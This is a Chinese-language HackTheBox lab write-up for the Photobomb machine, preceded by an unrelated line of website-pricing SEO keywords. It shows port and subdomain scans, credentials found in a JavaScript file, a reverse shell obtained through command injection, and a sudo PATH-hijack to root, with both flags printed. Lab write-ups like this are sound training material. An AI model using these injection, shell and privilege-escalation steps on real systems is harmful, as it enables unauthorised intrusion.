一级域名网站怎样收费的,南京网站销售,郑州广告设计与制作公司,电商平台法律法规目录
连接至HTB服务器并启动靶机
使用nmap对靶机进行端口开放扫描
再次使用nmap对靶机开放端口进行脚本、服务扫描
使用ffuf进行简单的子域名扫描
使用浏览器直接访问该域名
选取一个照片进行下载#xff0c;使用Yakit进行抓包
USER_FLAG#xff1a;a9afd9220ae2b5731…目录
连接至HTB服务器并启动靶机
使用nmap对靶机进行端口开放扫描
再次使用nmap对靶机开放端口进行脚本、服务扫描
使用ffuf进行简单的子域名扫描
使用浏览器直接访问该域名
选取一个照片进行下载使用Yakit进行抓包
USER_FLAGa9afd9220ae2b573190f0ae0d9952f1c
特权提升
新建一个find文件(Shell)
ROOT_FLAG2476206b2085f447038e0b03792bf147 连接至HTB服务器并启动靶机 靶机IP10.10.11.182 分配IP10.10.16.7 使用nmap对靶机进行端口开放扫描
nmap -p- -sS --min-rate1500 -T5 -Pn 10.10.11.182 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nmap -p- -sS --min-rate1500 -T5 -Pn 10.10.11.182 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-10 19:43 EST Nmap scan report for 10.10.11.182 (10.10.11.182) Host is up (0.16s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 45.53 seconds 再次使用nmap对靶机开放端口进行脚本、服务扫描
nmap -p 22,80 -sCV 10.10.11.182 可以看到这里访问靶机80端口被重定位将其写入hosts中
echo 10.10.11.182 photobomb.htb /etc/hosts 使用ffuf进行简单的子域名扫描
ffuf -u http://photobomb.htb/ -H Host: FUZZ.photobomb.htb -w ../dictionary/subdomains-top20000.txt -t 200 -fc 302 使用浏览器直接访问该域名
点击click here会跳出认证框 按住CtrlU查看网页源码可以找到一个JS文件photobomb.js 直接点击查看其内容获得一份凭证 账户pH0t0 密码b0Mb! 使用该凭证进行登录进入相册页 选取一个照片进行下载使用Yakit进行抓包 经过测试filetype这个参数点是无回显出网RCE(这里ping务必选定-c参数选择此数不然就会一直ping) 本地侧nc收到回显 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.16.7] from (UNKNOWN) [10.10.11.182] 56584 bash: cannot set terminal process group (696): Inappropriate ioctl for device bash: no job control in this shell wizardphotobomb:~/photobomb$ whoami whoami wizard 查找user_flag位置并查看其内容 wizardphotobomb:~/photobomb$ find / -name user.txt 2/dev/null find / -name user.txt 2/dev/null /home/wizard/user.txt wizardphotobomb:~/photobomb$ cat /home/wizard/user.txt cat /home/wizard/user.txt a9afd9220ae2b573190f0ae0d9952f1c USER_FLAGa9afd9220ae2b573190f0ae0d9952f1c 特权提升
查看该用户可特权运行的命令
sudo -l wizardphotobomb:~/photobomb$ sudo -l sudo -l Matching Defaults entries for wizard on photobomb: env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User wizard may run the following commands on photobomb: (root) SETENV: NOPASSWD: /opt/cleanup.sh 提升TTY
python3 -c import pty; pty.spawn(sh)
查看/opt/cleanup.sh内容
cat /opt/cleanup.sh $ cat /opt/cleanup.sh cat /opt/cleanup.sh #!/bin/bash . /opt/.bashrc cd /home/wizard/photobomb # clean up log files if [ -s log/photobomb.log ] ! [ -L log/photobomb.log ] then /bin/cat log/photobomb.log log/photobomb.log.old /usr/bin/truncate -s0 log/photobomb.log fi # protect the priceless originals find source_images -type f -name *.jpg -exec chown root:root {} \; 上述代码中我主要关注这一部分bashrc文件通常是bash环境配置文件 但是这个文件默认应该不在/opt目录下所以我尝试寻找该系统的所有bashrc文件路径
find / -name *bashrc* -type f 2/dev/null $ find / -name *bashrc* -type f 2/dev/null find / -name *bashrc* -type f 2/dev/null /opt/.bashrc /usr/share/byobu/profiles/bashrc /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc /usr/share/base-files/dot.bashrc /usr/lib/python3/dist-packages/pexpect/bashrc.sh /etc/skel/.bashrc/etc/bash.bashrc /home/wizard/.bashrc 使用diff命令将/opt/.bashrc文件与/etc/bash.bashrc文件进行内容比对 $ diff /etc/bash.bashrc /opt/.bashrc diff /etc/bash.bashrc /opt/.bashrc 5a6,11 # Jameson: ensure that snaps dont interfere, cos they are dumb PATH${PATH/:\/snap\/bin/} # Jameson: caused problems with testing whether to rotate the log file enable -n [ # ] 可以看到该/opt/cleanup.sh脚本引用的环境配置文件/opt/.bashrc中关于Shell所运行的二进制文件路径配置与系统默认文件(/etc/bash.bashrc)不同
系统中的/etc/bash.bashrc文件使用的是/bin/绝对路径从这开始读取
而/opt/.bashrc文件并未配置二进制文件寻找路径
这意味着如果我们运行/opt/cleanup.sh脚本它将会从$PATH环境变量中的所有目录中查找二进制文件
再次查看脚本内容在最后一行中可见使用的find命令并非绝对路径 提权思路就很简单了当前目录下新建一个find命令并将当前目录写入$PATH环境变量头部
与此同时用这临时设置的环境变量特权(sudo)运行/opt/cleanup.sh脚本
新建一个find文件(Shell)
echo bash -i find
为find文件赋执行权限
chmod x find
配置临时环境变量并启动/opt/cleanup.sh脚本
sudo PATH$PWD:$PATH /opt/cleanup.sh wizardphotobomb:~$ echo bash -i find echo bash -i find wizardphotobomb:~$ chmod x find chmod x find wizardphotobomb:~$ sudo PATH$PWD:$PATH /opt/cleanup.sh sudo PATH$PWD:$PATH /opt/cleanup.sh rootphotobomb:/home/wizard/photobomb# whoami whoami root 在/root目录下找到了root.txt rootphotobomb:/# cd /root cd /root rootphotobomb:~# ls ls root.txt rootphotobomb:~# cat root.txt cat root.txt 2476206b2085f447038e0b03792bf147 ROOT_FLAG2476206b2085f447038e0b03792bf147